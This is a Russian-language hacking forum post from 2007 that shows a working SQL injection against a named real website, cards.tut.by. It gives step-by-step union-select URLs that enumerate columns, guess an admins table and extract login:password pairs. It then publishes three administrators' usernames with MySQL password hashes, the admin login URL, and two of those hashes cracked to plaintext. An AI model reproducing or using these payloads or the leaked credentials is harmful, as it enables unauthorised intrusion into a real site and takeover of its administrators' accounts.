13.04.2007, 08:43
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от neval
http://cards.tut.by/holidays.php?event=-
немного не там, но:
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6/*&m=4
это вывод
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6+from+admins/*&m=4
подобрал таблицу ' admins'
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins/*&m=4
логин:пасс одного из админов
остальных перебираем лимитом
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins+limit+0,1/*&m=4
alesya:5aa0fa5819ba07df
vitovt:2e782c85379a326e
zettich:773359240eb9a1d9
mysql4-hash, перебор passwordspro или другими тулзами, удачи.
админка: _http://cards.tut.by/admin/login.php
//upd:
2e782c85379a326e = 12345
773359240eb9a1d9 = 123
нужно расшифровать #1 (:
Последний раз редактировалось n1†R0x; 13.04.2007 в 08:53..
|
|
|